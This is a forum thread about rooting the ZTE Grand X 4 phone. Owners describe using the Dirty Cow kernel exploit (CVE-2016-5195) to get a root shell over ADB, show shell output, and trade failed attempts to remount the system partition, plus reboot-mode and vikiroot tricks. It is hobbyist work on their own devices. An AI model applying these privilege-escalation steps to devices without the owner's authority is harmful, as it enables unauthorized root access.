ZTE Grand X 4 - Rooting Progress

Search This thread

scitrice

Member
Jan 28, 2017
5
8
This thread is made in an effort to root the ZTE Grand X 4 (Z957). At this point I've made some progress by using the Dirty Cow exploit to access a root shell via ADB, but have been unable to install su to the system partition.

Notes: stock rom, no custom recovery.

Exploit method:
Follow the instructions posted by Arinerron on GitHub regarding CVE-2016-5195 (under 10 posts, cannot share direct link)
When successful you will see "root@financier:/ #" as your shell prompt, however the session will hang after any command. That said, /system/run-as is still updated allowing you to do the following:

$ adb shell
shell@financier:/ $ run-as
uid run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0
shell@financier:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0

you have access to the android system as root within this shell, but this is where I'm getting stuck. I'm not able to find a way to mount the system partition as read/write, and as such unable to install su. Also note that you will need to run the exploit again anytime you reboot the device. I have tried the following methods:

$ adb shell cp /sdcard/Download/su /system/bin/su
cp: /system/bin/su: Read-only file system

shell@financier:/ # mount -o rw,remount /system
mount: Permission denied

adb reboot disemmcwp
#still unable to remount the system partition

At this point I'll share what I've been able to do so far and see if anyone else has ideas for a next step.
 

egalambos

Member
Jul 29, 2010
38
4
Moto G 5G
This worked on my ZTE GrandX Max Plus to permanently disable the write protection on the system partition.

Good luck!!

reboot disemmcwp

If you ever want to re-enable being blocked from mounting system rw:

reboot emmcwpenab
 

JCEWL93

Member
Jan 3, 2012
13
5
Any luck on this root? I am looking to buy a phone on Cricket, but I need one that I can root.
 

kbtech

New member
Feb 5, 2017
3
1
Bump, I've tried but I also get stuck on the same three methods:

$ adb shell cp /sdcard/Download/su /system/bin/su
cp: /system/bin/su: Read-only file system

shell@financier:/ # mount -o rw,remount /system
mount: Permission denied

adb reboot disemmcwp
#still unable to remount the system partition
 
  • Like
Reactions: Jcarson237

scitrice

Member
Jan 28, 2017
5
8
Thought I would post an update: Still no success on my end.

"Rooting" is easy, but breaking out of the selinux context to do anything is hard. ie. I expanded on timwr/CVE-2016-5195 by trying to use vikiroot to break out of the u:r:shell:s0 context. To do this adb push the vikiroot exploit to /data/local/tmp and then use the timwr method to run that exploit as root:
shell@financier:/ # /data/local/tmp/exploit
Unfortunately I could only get the reverse shell to work as a glorified echo. If anyone knows where I could find some c++ code for running a shell in android for me to work off of I'm willing to see how much further I can get in that direction.

As disemmcwp doesn't work I'm wondering if ZTE found a different way to lock down the system partition? Interestingly there is an OEM-specific settings button that is greyed out (find it at *#*#4636#*#*).

I'm running firmware from Wind/Freedom Mobile so I can access the bootloader and unlock it, but I can't install SU or anything from stock. Additionally, there is no TWRP released for this phone yet. I have no idea where to find the board config files for this phone. Without a custom bootloader I'm not sure how to make permanent changes to the rom at this point.
 
  • Like
Reactions: kingkos

Mazaris

New member
Mar 30, 2017
3
0
I've tried many different ways to root this phone. For weeks, I've tried. Nothing. I personally think that there is no way to, not now at least.
 

kbtech

New member
Feb 5, 2017
3
1
Don't know if this will help but​, I found that they lock the bootloader under the developer settings!
 

dragonh1

New member
Apr 28, 2017
1
0
Has anyone tried a one click root application like KingoRoot ?
Or is this more for doing it on your own without a service like that?
 

scitrice

Member
Jan 28, 2017
5
8
Previously I had tried a series of one click solutions but I haven't found any that support this device yet. Typically they use the same exploits we've tried to use the hard way ;)

After slacking for awhile I was finally able to poke around some of the internals of the phone in FTM mode using qualcomm developer tools. Lots of nifty things in the embedded file system and plenty of opportunities to flash new boot loaders and roms to the device for those of you who have a locked bootloader, but unfortunately I haven't been able to extract a copy of the stock rom or bootloaders. I'm still lacking the information I need to compile a new one for the phone.

Where I stand:
Can create a root shell, cannot remount system as read/write for permanent root in stock rom.
Can install new boot loader, no twrp or other found for this hardware.
Can compile new twrp, no boardconfig files (handy to avoid bricking your phone)
Can explore EFS and access chip via FTM, not sure how or if possible to download current rom / bootloader from here.

Happy for any tips on what to try next!
 

scitrice

Member
Jan 28, 2017
5
8
If you can get those tools off of the site maybe I'll message you about grabbing a few items on my Christmas list! QPST includes the tools necessary, and the tools to backup the 425 should you accidentally brick your phone (basically impossible to truly brick a qualcomm if you have the right tools). Archive.org has a copy, don't remember where to find the driver pack but you'll need that too (and a windows build).

Read through some notes on marshmellow and sounds like you have to remount system from recovery. I'm camping for the next month but will try talking to the TWRP team about porting a bootloader to the phone when I get back.

Let me know if you make any headway!
 

wchriseg

Member
Jul 17, 2007
5
5
try this adb command and see if you get a qualcomm serial port after reboot
Code:
adb reboot edl
if that doesnt work try
Code:
adb reboot bootloader
then run the attached
 

Attachments

  • Fastboot_edl-v2.zip
    217.2 KB · Views: 274

paindaddi

Member
Mar 25, 2017
15
2
How's everyone here? I also am awaiting root for this device. It really needs some shine on it's mid levelness. So here is my friend's​ zte warp 7 work for root. He also got some killer roms for the Huawei ascend XT. He does great work. I'm sure if he had a grand x 4 he could move this along. Just a suggestion. This man can this done. Just a suggestion for all of us. https://xdaforums.com/showpost.php?p=72560392&postcount=246

---------- Post added at 11:31 PM ---------- Previous post was at 11:10 PM ----------

https://xdaforums.com/member.php?u=7934375
 

Top Liked Posts

  • There are no posts matching your filters.
  • 5
    This thread is made in an effort to root the ZTE Grand X 4 (Z957). At this point I've made some progress by using the Dirty Cow exploit to access a root shell via ADB, but have been unable to install su to the system partition.

    Notes: stock rom, no custom recovery.

    Exploit method:
    Follow the instructions posted by Arinerron on GitHub regarding CVE-2016-5195 (under 10 posts, cannot share direct link)
    When successful you will see "root@financier:/ #" as your shell prompt, however the session will hang after any command. That said, /system/run-as is still updated allowing you to do the following:

    $ adb shell
    shell@financier:/ $ run-as
    uid run-as 2000
    uid 0
    0 u:r:runas:s0
    context 0 u:r:shell:s0
    shell@financier:/ # id
    uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0

    you have access to the android system as root within this shell, but this is where I'm getting stuck. I'm not able to find a way to mount the system partition as read/write, and as such unable to install su. Also note that you will need to run the exploit again anytime you reboot the device. I have tried the following methods:

    $ adb shell cp /sdcard/Download/su /system/bin/su
    cp: /system/bin/su: Read-only file system

    shell@financier:/ # mount -o rw,remount /system
    mount: Permission denied

    adb reboot disemmcwp
    #still unable to remount the system partition

    At this point I'll share what I've been able to do so far and see if anyone else has ideas for a next step.
    2
    Previously I had tried a series of one click solutions but I haven't found any that support this device yet. Typically they use the same exploits we've tried to use the hard way ;)

    After slacking for awhile I was finally able to poke around some of the internals of the phone in FTM mode using qualcomm developer tools. Lots of nifty things in the embedded file system and plenty of opportunities to flash new boot loaders and roms to the device for those of you who have a locked bootloader, but unfortunately I haven't been able to extract a copy of the stock rom or bootloaders. I'm still lacking the information I need to compile a new one for the phone.

    Where I stand:
    Can create a root shell, cannot remount system as read/write for permanent root in stock rom.
    Can install new boot loader, no twrp or other found for this hardware.
    Can compile new twrp, no boardconfig files (handy to avoid bricking your phone)
    Can explore EFS and access chip via FTM, not sure how or if possible to download current rom / bootloader from here.

    Happy for any tips on what to try next!
    1
    Bump, I've tried but I also get stuck on the same three methods:

    $ adb shell cp /sdcard/Download/su /system/bin/su
    cp: /system/bin/su: Read-only file system

    shell@financier:/ # mount -o rw,remount /system
    mount: Permission denied

    adb reboot disemmcwp
    #still unable to remount the system partition
    1
    Thought I would post an update: Still no success on my end.

    "Rooting" is easy, but breaking out of the selinux context to do anything is hard. ie. I expanded on timwr/CVE-2016-5195 by trying to use vikiroot to break out of the u:r:shell:s0 context. To do this adb push the vikiroot exploit to /data/local/tmp and then use the timwr method to run that exploit as root:
    shell@financier:/ # /data/local/tmp/exploit
    Unfortunately I could only get the reverse shell to work as a glorified echo. If anyone knows where I could find some c++ code for running a shell in android for me to work off of I'm willing to see how much further I can get in that direction.

    As disemmcwp doesn't work I'm wondering if ZTE found a different way to lock down the system partition? Interestingly there is an OEM-specific settings button that is greyed out (find it at *#*#4636#*#*).

    I'm running firmware from Wind/Freedom Mobile so I can access the bootloader and unlock it, but I can't install SU or anything from stock. Additionally, there is no TWRP released for this phone yet. I have no idea where to find the board config files for this phone. Without a custom bootloader I'm not sure how to make permanent changes to the rom at this point.
    1
    Previously I had tried a series of one click solutions but I haven't found any that support this device yet. Typically they use the same exploits we've tried to use the hard way ;)

    After slacking for awhile I was finally able to poke around some of the internals of the phone in FTM mode using qualcomm developer tools. Lots of nifty things in the embedded file system and plenty of opportunities to flash new boot loaders and roms to the device for those of you who have a locked bootloader, but unfortunately I haven't been able to extract a copy of the stock rom or bootloaders. I'm still lacking the information I need to compile a new one for the phone.

    Where I stand:
    Can create a root shell, cannot remount system as read/write for permanent root in stock rom.
    Can install new boot loader, no twrp or other found for this hardware.
    Can compile new twrp, no boardconfig files (handy to avoid bricking your phone)
    Can explore EFS and access chip via FTM, not sure how or if possible to download current rom / bootloader from here.

    Happy for any tips on what to try next!

    Message madvane he could help